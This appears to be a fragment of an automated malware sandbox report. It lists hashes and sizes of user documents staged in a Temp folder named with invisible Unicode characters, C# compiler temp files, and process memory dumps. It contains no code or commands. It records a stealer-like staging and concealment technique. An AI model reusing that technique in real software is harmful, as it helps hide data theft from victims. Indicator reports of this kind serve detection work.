b5654fd801dcd7094db657a7b371874bf4d4a4f29cbf4b96a6a7e7b22092479f

SHA512
59a5435a8842be036606c81ac77ce81bf34b1086fd4e0febcc4d5382616a352d67cde82706991788fbb90b7ec3b0ff7d963d2fffa037056c787b899cf5547844

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Desktop\UnpublishAssert.xlsx

Filesize
551KB

MD5
e7b2d19e18d5a4cf9922aa078991bcf6

SHA1
44a24145d19da62f8ca753fbca70894e3d5e8d3d

SHA256
8a43c1d84632a681bf458bc60734b18dad6dd2a3539b26ed6e8ecf0c72b5d7f4

SHA512
49177f0c1db8ef91b6b3d6ffed681d8c80606f1b33ee0af729e1ac1b26a09024d80ce234b976659d867607749ab197fe353a6b6c1bb875e06d457a11e029fba1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Desktop\UnpublishProtect.xls

Filesize
463KB

MD5
c8692fa4b51e1f2b38b4c38812167370

SHA1
112c7dc48700027a0f3fdfdf34f835f716338743

SHA256
a95161495970e81c631dad2423d85df64c86946598133e4d7fc1f3e161d44250

SHA512
08f5d718826166fb7a1257a787db730f9a8409161f0ede3ada8d06cfd0f874890a40f51e83d46c57f3f621e89f8c6aec251f2e4de850517ec63c1d4003cb5033

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Documents\ResetPublish.xlsx

Filesize
9KB

MD5
a079d7759c9fa9e4e23828615fe207c2

SHA1
ef6b6bad96d5e92974ef2cc97db41adabeaf4a61

SHA256
b8fe88f0f6c53c9dfc430a737aa6e2e281651f3430bc5c671239b1ddf3e73780

SHA512
625951dfdd76aece118bc4bc03ce1bfddea103b16c94531298275e1b19f97c4d307186e0f23df0d5fa58e1def5bfbcf7a356b510400cce8b93aa4730e05a784a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Documents\SubmitOpen.xlsx

Filesize
11KB

MD5
affa7fab41e6a49c5998034acb0d109a

SHA1
4bc0e3d55f298659a0f413aafb9d709b0a55a7a1

SHA256
f98735ce7320dff4932cf60be1706fee0fac00e443999cd0c956c9135227d1d9

SHA512
63a605a80505d9e2fe1264f10db5623fe3a5434169a43c7501fd16876db3452e206fa55faabf2969957f442fe84f48b11b5e727c40c864434ad44ce747464500

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Documents\UpdateCopy.pdf

Filesize
1023KB

MD5
8ac92d8218182cfa46882d2659100fd5

SHA1
f175915c8f85d5352994d72d2089bfb17ba6083c

SHA256
830c605f74d99d38bf5d09354e5d9c88559cb2afd3a11d7657e66e3812cfc810

SHA512
acb21e3d5e51fd4a153e0732b1b1bbfde3a54f7b216336efe759ee80c2d9d3ebd7481132668b45d7b66e683f2fe2a3e8b0b766fd95eba182c7b5eafe11de62d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Downloads\ConvertToJoin.png

Filesize
1.1MB

MD5
3903c877e3914b2a5ada30d13c147022

SHA1
c4afd26e45816bbac8ef0c20fd816e6e4f3021ab

SHA256
89429178026d555174a45c0414aa30b446111f9020b54e8f0f94eb416acb208e

SHA512
46ba99d0747c615286a155893bd182a3c5f583486c980957d50ecf485827bc3f533be035368440f7255c4e063af6f91240ce39b20e1431250fb1649bf6905960

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Downloads\MergeSet.mp3

Filesize
544KB

MD5
107a2230a8a786c6944c12fb25d97bff

SHA1
3ce41b87289a9145b33babf3d32d0adf418465aa

SHA256
44385db3922621224c1fd409266bbf6649a09ca42ce023103ae74826cfd4bd61

SHA512
c753e7bd0fb9600ceae8cb788c39d929285d8574dc3a6e907c3ee8f4cd549b0f651d3e05ea1cb7722cb4ce67df08a8e29a94f98c8d36654a92a4cc18970ba577

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‎ \Common Files\Downloads\NewJoin.txt

Filesize
419KB

MD5
df8ea3e65b6b3e5b3c2132d01e62164f

SHA1
8253f0a7bacf1a739041645a9dec4bcbe89a3c6f

SHA256
abceb86f1ceb0099f5f508584e0d35811c3256f5d194271825d9a582eb73c9c0

SHA512
8d203aade6eb37463799be1863f3815da7b8815124f631ac35dbcb252f4d39be63bd85bfb3b00dcdd037172ce024f1a5493f03c1da98ef3be9aff6813e2ef15a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\j0ps2rfm\CSCDBD04DD6617044AA9D97BD6BD7E2B422.TMP

Filesize
652B

MD5
d9cd38264f9910a9a488d6e03fa88455

SHA1
6ac00f0edaa817d1465e1d59db5929efbeb4b252

SHA256
43e442281866d1995aec09296cccaba9eb38ddf330a91d26d7b75a8cf562d8d5

SHA512
2c4a452ace81594c859286dd3a05a49ae10971035bf7af6f50d6d83d91c3eaaa1df32970070d3ebd1593d380e05b122e96de749f9c300e6e52397306e5a85d16

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\j0ps2rfm\j0ps2rfm.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\j0ps2rfm\j0ps2rfm.cmdline

Filesize
607B

MD5
e55707c40d00e8f954cb2a6297ff5f85

SHA1
14cce6aaac27024c54a9e25b09f331a036877a52

SHA256
f0147b232ea790f3cb5851468b8a22623c77bfa17985daa3fc37368158b4b381

SHA512
991af0823b0a44400a0237d3f95269062fed741f7a81deeb19940dfab41f2f3183b9a5590672f182ff2e83b130662956c124d13fa6ce6f259b7cb19acd320acc

Download Submit
memory/1256-66-0x00007FFB126D0000-0x00007FFB12703000-memory.dmp

Filesize
204KB

Download
memory/1256-127-0x00007FFB126D0000-0x00007FFB12703000-memory.dmp

Filesize
204KB

Download
memory/1256-283-0x00007FFB03820000-0x00007FFB0393C000-memory.dmp

Filesize
1.1MB

Download
memory/1256-98-0x00007FFB14CA0000-0x00007FFB14CB9000-memory.dmp

Filesize
100KB

Download
memory/1256-79-0x00007FFB1AF40000-0x00007FFB1AF4D000-memory.dmp

Filesize
52KB

Download
memory/1256-25-0x00007FFB11340000-0x00007FFB1192E000-memory.dmp

Filesize
5.9MB

Download
memory/1256-48-0x00007FFB1C5C0000-0x00007FFB1C5CF000-memory.dmp

Filesize
60KB

Download
memory/1256-76-0x00007FFB126B0000-0x00007FFB126C4000-memory.dmp

Filesize
80KB

Download
memory/1256-186-0x00007FFB03E70000-0x00007FFB03F3D000-memory.dmp

Filesize
820KB

Download
memory/1256-70-0x00007FFB11340000-0x00007FFB1192E000-memory.dmp

Filesize
5.9MB

Download
memory/1256-188-0x00007FFB03940000-0x00007FFB03E62000-memory.dmp

Filesize
5.1MB

Download
memory/1256-96-0x00007FFB03F40000-0x00007FFB040B6000-memory.dmp

Filesize
1.5MB

Download
memory/1256-78-0x00007FFB12A80000-0x00007FFB12AAD000-memory.dmp

Filesize
180KB

Download
memory/1256-81-0x00007FFB1A060000-0x00007FFB1A079000-memory.dmp

Filesize
100KB

Download
memory/1256-82-0x00007FFB03820000-0x00007FFB0393C000-memory.dmp

Filesize
1.1MB

Download
memory/1256-30-0x00007FFB14B50000-0x00007FFB14B74000-memory.dmp

Filesize
144KB

Download
memory/1256-83-0x00007FFB125B0000-0x00007FFB125D3000-memory.dmp

Filesize
140KB

Download
memory/1256-54-0x00007FFB12A80000-0x00007FFB12AAD000-memory.dmp

Filesize
180KB

Download
memory/1256-187-0x000001C65EE70000-0x000001C65F392000-memory.dmp

Filesize
5.1MB

Download
memory/1256-73-0x00007FFB03940000-0x00007FFB03E62000-memory.dmp

Filesize
5.1MB

Download
memory/1256-74-0x00007FFB14B50000-0x00007FFB14B74000-memory.dmp

Filesize
144KB

Download
memory/1256-71-0x00007FFB03E70000-0x00007FFB03F3D000-memory.dmp

Filesize
820KB

Download
memory/1256-72-0x000001C65EE70000-0x000001C65F392000-memory.dmp

Filesize
5.1MB

Download
memory/1256-56-0x00007FFB1A060000-0x00007FFB1A079000-memory.dmp

Filesize
100KB

Download
memory/1256-64-0x00007FFB1C3C0000-0x00007FFB1C3CD000-memory.dmp

Filesize
52KB

Download
memory/1256-62-0x00007FFB14CA0000-0x00007FFB14CB9000-memory.dmp

Filesize
100KB

Download
memory/1256-60-0x00007FFB03F40000-0x00007FFB040B6000-memory.dmp

Filesize
1.5MB

Download
memory/1256-58-0x00007FFB125B0000-0x00007FFB125D3000-memory.dmp

Filesize
140KB

Download
memory/2456-201-0x000001B6548F0000-0x000001B6548F8000-memory.dmp

Filesize
32KB

Download
memory/4408-95-0x000001C478E10000-0x000001C478E32000-memory.dmp

Filesize
136KB

Download
memory/4408-94-0x00007FFB02790000-0x00007FFB03252000-memory.dmp

Filesize
10.8MB

Download
memory/4408-113-0x00007FFB02790000-0x00007FFB03252000-memory.dmp

Filesize
10.8MB

Download
memory/4408-84-0x00007FFB02793000-0x00007FFB02795000-memory.dmp

Filesize
8KB

Download
memory/4408-97-0x00007FFB02790000-0x00007FFB03252000-memory.dmp

Filesize
10.8MB

Download